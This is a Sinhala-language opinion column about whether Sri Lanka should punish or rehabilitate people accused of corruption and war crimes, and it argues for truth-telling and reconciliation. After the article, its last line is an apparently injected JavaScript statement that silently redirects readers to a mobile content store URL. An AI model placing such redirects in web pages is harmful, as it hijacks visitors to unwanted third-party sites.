දූෂණ හා යුද අපරාධ සඳහා දණ්ඩනයද? පුනරුත්ථාපනයද?

අජිත් පැරකුම් ජයසිංහ

දුම්රියේ ටිකට් නොමැතිව හොරෙන් ආ මගියෙක් වේදි කාවේදී ටිකට් පරීක්ෂකවරයකුට මාට්ටු වූයේ ය.
‘කෝ ටිකට්?
‘ටිකට් තියෙන්නේ කොහොමද, මං කෝච්චියෙ ආවෙ නැහැනේ,’ මගියා කීවේ ය.
‘තමුන් කෝච්චියෙ ආවෙ ටිකට් නැතිව නේ ද?’
‘පිස්සුද? මං කෝච්චියෙ ආවෙ නැහැ. කෝච්චියෙ ආවා නම් ටිකට් තියෙන්න එපා යැ.’

මහින්ද රාජපක්ෂ ආණ්ඩුවේ ප‍්‍රබලයන් වූ රාජපක්ෂ පවුලේ සිට ඇමති මණ්ඩලය හරහා ප‍්‍රාදේශීය සභා මන්ත‍්‍රීවරයා දක්වා පිරිස දූෂණ චෝදනා පිළිබඳ මතු කරන තර්කය ද මෙවැනි ය. දූෂණ කළා නම් දඬුවම් තිබෙන්න එපායැ යන තර්කය ඔවුහු රැුගෙන එති. ඔවුන් කියන පරිදි දඬුවම් නැත්තේ දූෂණ නො කළ නිසා ය.
ඇත්තම තත්ත්වය නම් චෝදනා නැත්තේ විමර්ශන නැති නිසා ය. දේශපාලකයන්ගේ දූෂණවලට එරෙහිව ක‍්‍රියාමාර්ග නොගැනීම පසුගිය දිනවල සාමාන්‍ය තත්ත්වය විය. පොලිසිය නම්නීකරණය වී තිබුණේ ම දූෂණ ගැන විමර්ශනය නො කරන්නට මිස කරන්නට නො වේ. එසේම, සමස්ත රාජ්‍ය ව්‍යූහය ම පාහේ දූෂණයට නම්නීකරණය කර තිබුණු එකක් විය. සමාජය තුළ මුල් බැසගෙන තිබෙන දූෂණය අහෝසි කිරීම ලෙහෙසි පහසු කාර්යයක් නො වේ.

ඉදිරියේදී පත් වන ශ‍්‍රී ලංකා නිදහස් පක්ෂ ආණ්ඩුවකින් මූල්‍ය අපරාධ විමර්ශන කොට්ඨාසය විසුරුවා හරින බව එක්සත් ජනතා නිදහස් සන්ධානයේ ලේකම් සුසිල් පේ‍්‍රමජයන්ත පවසයි. ඉදිරි මහ මැතිවරණය වෙනුවෙන් මහින්දගේ හිටපු ගෝලබාලයන්ට ඉදිරිපත් කරන්නට තිබෙන ලොකු ම සටන් පාඨය ‘අපට එරෙහිව විමර්ශන නවතව්!’ යන්න ය. ඔවුන් සිතා සිටින්නේ ජනතාව මේ සටන් පාඨයට ඡුන්දය දෙනු ඇතැයි කියා ද?
විශේෂිත අපරාධ විමර්ශනය කිරීම සඳහා පොලිස් ඒකක ගොඩනගන එක නීති විරෝධී නම් ත‍්‍රස්ත විමර්ශන කොට්ඨාසය ද නීති විරෝධී විය යුතු ය. පොලිස් ළමා හා කාන්තා කාර්යාංශය ද නීති විරෝධී විය යුතු ය. පසුගිය කාලයේ මහින්ද ආගමික පොලිසියක් ද හැදුවේ ය.
පසුගිය කාලයේ සිදුවූ ¥ෂණවල තරම අනුව විමර්ශනය සඳහා සමස්ත පොලිසියම යෙදෙව්වත් ප‍්‍රමාණවත් වන්නේ නැත. රාජ්‍ය බලය යොදවමින් දේශපාලකයන් තම ¥ෂණ යට ගසා ගත් බව නො දන්නේ කවුරු ද? ජනාධිපති මන්දිරයේ ලිපිගොනු අතන මෙතන සඟවා තිබියදී හමු විය.

මහා පරිමාණ ¥ෂණ චෝදනා වෙනුවට තවමත් දේශපාලකයන්ට එරෙහිව එල්ලවෙමින් තිබෙන්නේ පොදු දේපළ අපහරණය පිළිබඳ සාපේක්ෂ වශයෙන් සුළු චෝදනා ය. එහෙත්, වරද නම් වරද ම ය. එහි ප‍්‍රමාණය වැදගත් නැත. ගම් මට්ටමේ ප‍්‍රාදේශීය සභා මන්ත‍්‍රීවරයා දක්වා ම මහින්ද ක‍්‍රමයේ අනුගාමිකයන් ගැසූ හතරවරං ගැහිලි ගැන මේ රටේ ජනතාව හොඳින් දනිති. හිටි ගමන් සල්ලිකාරයන් වූ සියලූ දේශපාලකයන් හා ඔවුන්ගේ චක්ගෝලයන් මුදල් හම්බ කළේ අයථා ලෙස බව නො දන්නේ කවුරු ද? එහෙත්, චෝදනා ඔප්පු කිරීම පහසු නැත. චෝදනා ගැන විමර්ශනය කරන්නට ශක්තිමත් ව්‍යූහයක් අවශ්‍ය ය. එවැන්නක් රටේ නැත. දේශපාලකයන් පාවිච්චි කරන්නේ ඒ දුර්වලකමයි. තමන් කළ කී දේ ගැන දන්නා චෞර දේශ පාලකයන් චෝදනා වලින් ගැලවෙන්නට නම් කළ යුත්තේ විමර්ශනවලට මුහුණ දී වරද පිළිගැනීමයි. තමන් දේශපාලන විෂම චක‍්‍රයක ගොදුරු බවට පත් වූ අය බව පිළිගන්නට සූදානම් අයට තමන් කොල්ලකන ලද මහජන දේපළ ආපසු භාර දී පුනරුත්ථාපනය වීමට අවස්ථාවක් ලබා දුන්නාට නම් කමක් නැත.

ලංකාවේ දූෂණය පිළිබඳ ප‍්‍රශ්න මෙන් ම යුද අපරාධ සම්බන්ධ ප‍්‍රශ්න ද ආමන්ත‍්‍රණය කළ යුතුව තිබෙන්නේ සාධනීය අනාගතයක් ඉලක්ක කරමින් මිස පළිගැනීම සඳහා නො වේ. මහජන දේපළ මංකොල්ල කෑ අයට දඬුවම් කිරීම සමාජයේ එක් පිරිසකගේ අමන්දානන්දයට හේතු වී තිබේ. මුක්තිය සදාකාලික යයි සිතාගෙන අනාරක්ෂිතව මහා පරිමාණ දූෂණවල යෙදුණු අය බියෙන් මුසපත් වී සිටිති. එහෙත්, සමස්ත ලාංකීය සමාජය ම දූෂණයේ ගැලී සිටින අතර පූර්ණ ලෙස එයින් මිදුණු අයෙකු සොයාගත නො හැකි තරමට ම තත්ත්වය සංකීර්ණ ය. මහා පරිමාණ සොරුන්ට එරෙහිව ක‍්‍රියාමාර්ග ගත් පමණින් ශෝධනය කළ නො හැකි තරමට දූෂණය සමාජයේ මුල් බැසගෙන තිබේ. ඒ නිසා අවශ්‍ය වන්නේ සමාජ පරිවර්තනයක් සඳහා අවශ්‍ය පියවර අධ්‍යාපනය, මාධ්‍ය හා සිවිල් සමාජය පැත්තෙන් ගැනීමයි. ප‍්‍රමුඛ කාර්යය වියයුත්තේ දණ්ඩනය නො වේ. දණ්ඩනය අනවශ්‍ය බවක් මෙයින් ඇඟවෙන්නේ නැත.

දණ්ඩනය හා අදාළ වන ප‍්‍රමුඛ ම ප‍්‍රශ්නය ඇත්තේ යුද්ධය හා සම්බන්ධවයි. මේජර් ජනරාල් ජගත් ඩයස් යුද හමුදා කාර්ය මණ්ඩල ප‍්‍රධානිවරයා ලෙස පත් කිරීම හියුමන් රයිට්ස් වොච් සංවිධානය ඇතුළු බලවේගවල උදහසට ලක් වී තිබේ.

තව මාස කීපයකින් එක්සත් ජාතීන්ගේ මානව හිමිකම් කොමිෂම විසින් ලංකාවේ යුද්ධයේ අවසන් අදියරේදී සිදු වූ බරපතළ මානව හිමිකම් උල්ලංඝනයන් හා යුද අපරාධ පිළිබඳ සිදු කළ පරීක්ෂණයේ වාර්තාව නිකුත් කරනු ඇත. ජගත් ඩයස් නම චෝදනා එල්ලවන්නන්ගේ ලැයිස්තුවේ ඉදිරියෙන් තිබෙන්නට බොහෝ දුරට ඉඩ තිබේ.
මේ වන විට යුද්ධය අවසන් වී වසර හයකි. ශ‍්‍රී ලංකා රජය අවස්ථා ගණනාවකදී පොරොන්දු වූ පරිදි අභ්‍යන්තර පරීක්ෂණයක් කළේ නැත. ජාත්‍යන්තර පරීක්ෂණයකට සහයෝගය දුන්නේ ද නැත. මෙම ප‍්‍රශ්නය සම්බන්ධයෙන් පසුගිය වසර හය පුරාවට ආණ්ඩුව කළ දෙය වූයේ නිකම් සිටීමයි. මහින්ද රාජපක්ෂ ආණ්ඩුව නම් තව තවත් ජාතිවාදය ඇවිස්සුවේ ය. බලය රැුක ගැනීම සඳහා යුද අපරාධ උත්කර්ෂයට නංවමින් ජයග‍්‍රහණයේ අයිතිය සංදර්ශනාත්මක ලෙස ප‍්‍රදර්ශනය කළේ ය.
ලංකාවේ යුද්ධයේදී මානව හිමිකම් උල්ලං ඝනයන් හා යුද අපරාධ සිදු කළේ හමුදාව හා එයට නායකත්වය දුන් ආණ්ඩුව පමණක් නො වේ. කොටි සංවිධානය ද යුද අපරාධ කළේය. සාකච්ඡුාමය විසඳුමකට යනවා වෙනුවට කොටි සංවිධානයට ද අවශ්‍ය වුණේ යුද්ධයෙන් ඊලාම් රාජ්‍යය දිනා ගන්නටයි. යුද්ධයේ ජයග‍්‍රහණය අනෙක් පැත්තට හැරුණා නම් අද හමුදාව සම්බන්ධයෙන් කරන චෝදනා කොටි සංවිධානය සම්බන්ධයෙන් ද එල්ල වීම නියත ය.

අනෙක් පැත්තෙන් මෙම දෙපැත්තේ ම පසුබිමේ සිටිමින් ඔවුන් යුද්ධයට පෙළඹවූ, ඒ සඳහා අවශ්‍ය මතවාද ගොඩනැගූ, මානව හිමිකම් උල්ලංඝනයන් හා යුද අපරාධ දිරිගැන්වූ, අරමුදල් සැපයූ විශාල බලවේගයක් සිටියි. ජයග‍්‍රහණයෙන් පසුව සිංහල පාර්ශ්වයේ ඇතැම් අය යුද්ධය කළේ තමන් නිසා යයි උදම් ද අනන්නට ද ඉදිරිපත් වූ හ.
මේ වනාහි සිංහල, දෙමළ දෙජාතියේ ම බහුතර ජනතාව විසින් දිරිගන්වන ලද යුද්ධයකි. යුද්ධයේ අවසන් අවස්ථාව ආසන්න වන තෙක් ම දෙමළ පාර්ශ්වයෙන් පවා යුද්ධය නවත්වන්නට උත්සාහ ගත්තේ නැත. යුද්ධයෙන් වන්නියේ දෙමළ සාමාන්‍ය වැසියන් දැඩි ලෙස පීඩාවට පත් වෙද්දීත්, කොළඹ හා ඩයස්පෝරාවේ මධ්‍යම පංතිකයන් බලා සිටියේ කොටි සංවිධානය ප‍්‍රාතිහාර්ය පාන අයුරු දකින්නට ය. කොටි නායකයන් පවා එවැනි ප‍්‍රාතිහාර්ය ගැන විශ්වාසය තබා සිටි බව පෙනේ.
මේ සියල්ල අවසානයේ එක් පාර්ශ්වයක සුළු පිරිසකට පමණක් එරෙහිව යුද අපරාධ චෝදනා ගෙන ඒම කෙතරම් සාධාරණ ද යන්න ප‍්‍රශ්නයකි. මෙම පිරිසට එරෙහිව යුද අපරාධ චෝදනා හා ඒවා ඔප්පු කිරීමට සාක්ෂි තිබිය හැකි ය. එහෙයින් ඔවුන් විමර්ශනයකට බිය වීම ගැන පුදුම විය යුතු නැත. එහෙත්, යුද අපරාධ කරන්නට ඔවුන් යොමු කළ, දිරි ගැන්වූ පිරිස අතහැර ඔවුන් පමණක් යුද අපරාධ අධිකරණයට ගෙන යාම වැරදි ය. විශේෂයෙන් ම දෙපැත්තේ ම යුදවාදී දේශපාලකයන්, ජනමාධ්‍ය හා ජාතිවාදී ක‍්‍රියාකාරිකයෝ ද යුද අපරාධ සම්බන්ධ චෝදනාවලට වගඋත්තර කරුවෝ ය. මෙම තත්ත්වය හමුවේ යුද අපරාධ කළ අයගෙන් කොටසකට පමණක් එරෙහිව ක‍්‍රියා කරන්නට යෑමෙන් සිදුවන්නේ අගතියකි.

කෙසේ හෝ දැන් යුද්ධය අවසන් ය. ඉතිහාසයේ කිසිදු යුද්ධයක් පොතේ හැටියට සිදු වී නැත. මානව හිමිකම් උල්ලංඝනය නො කළ කිසිදු යුද්ධයක් නැත. දැන් කළ යුතුව තිබෙන්නේ යුද්ධය නිසා බෙදුණු සමාජය යළි ඒකාබද්ධ කිරීමයි. ජාතීන් අතර සංහිඳියාව ඇති කිරීමයි. ජාතික සීමාවන් ඉක්මවා ගිය පුළුල් ලාංකීය දේශපාලන ප‍්‍රජාවක් ගොඩනැගීම සඳහා අවශ්‍ය පියවර ගැනීමයි. මේ වන විටත්, යම් දුරකට එය සිදුවෙමින් තිබේ. පසුගිය ජනාධිපතිවරණයේදී අරමුණක් වෙනුවෙන් ජාතික සීමා අබිබවමින් සිංහල, දෙමළ මුස්ලිම් ජනයා ඒකරාශි වූ ආකාරය නිදසුනක් ලෙස සැලකිය හැකි ය.

ශ‍්‍රී ලංකාව සම්බන්ධයෙන් වඩා ගැළපෙන්නේ දණ්ඩනය ඉලක්ක කර ගත් යුද අපරාධ පරීක්ෂණයක් නො වේ. එවැන්නකින් සිදුවන්නේ ජාතීන් අතර බෙදීම තවත් පුළුල් වීමයි. අවශ්‍ය වන්නේ සංහිඳියාව පාදක කරගත් සත්‍ය කොමිසමක් වැනි දෙයකි. අනාගත සංහිඳියාව වෙනුවෙන් සත්‍යය වාර්තාගත කර තැබීම හා යුද්ධයේ විෂම චක‍්‍රය තුළ සිදු වූ අපරාධ සම්බන්ධයෙන් වගකීම් සහගත සමාව ඉල්ලා සිටීමකි. අවංක කනගාටුව ප‍්‍රකාශ කිරීමකි.

දූෂණ චෝදනා මෙන් ම යුද අපරාධ සම්බන්ධයෙන් අප විසින් මතු කරනු ලබන කාරණය මෙයයි. වැරදි කළ අයට දඬුවම් කිරීම නම් කාරණයේදී අප විසින් සැලකිය යුතුව තිබෙන වැදගත් ම කරුණක් වන්නේ එකී දණ්ඩනයන් හේතුවෙන් සමාජය තවදුරටත් බෙදී යනවා ද, නැතිනම් සංහිඳියාව, සහජීවනය හා ප‍්‍රජාතන්ත‍්‍රවාදය දිරිගැන් වෙනවා ද යන්නයි. අනෙක් පැත්තෙන් මෙම ප‍්‍රශ්න දෙකෙහිදී ම සමස්ත සමාජයක් ම පාහේ අඩු වැඩි වශයෙන් වරදකාරිත්වය බෙදා ගත යුතු ය. එවැනි සංදර්භයක් තුළ, වරද පිළිගෙන, හානිය අවම කිරීමේ ක‍්‍රියාමාර්ග ගනිමින්, සම්මුති සහගත ලෙස කටයුතු කිරීමටත්, පුනරුත්ථානය වීමටත්, චෝදනා එල්ල වන්නන්ට අවස්ථාව ලබාදීම සමාජ ප‍්‍රගමනය සම්බන්ධයෙන් වඩා නිවැරදි ක‍්‍රියාමාර්ගය විය හැකි ය. එහෙත්, සත්‍යය වාර්තාගත වීම නම් අත්‍යවශ්‍ය ය.

කෙටියෙන් කිවහොත්, යුද අපරාධ හා ¥ෂණ චෝදනා එල්ලවන්නන්, ඒ චෝදනා තොරොම්බල් කර ගැලරියෙන් විසිල් ලබා ගනිමින් රට අපහසුතාවට පත් කරන්නට උත්සාහ නො කළ යුතු ය. ඔවුන්ට කළ හැකි හොඳ ම දෙය වන්නේ හැකි තරම් නිහඬ ජීවිත කරා මාරු වීමයි.

 window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;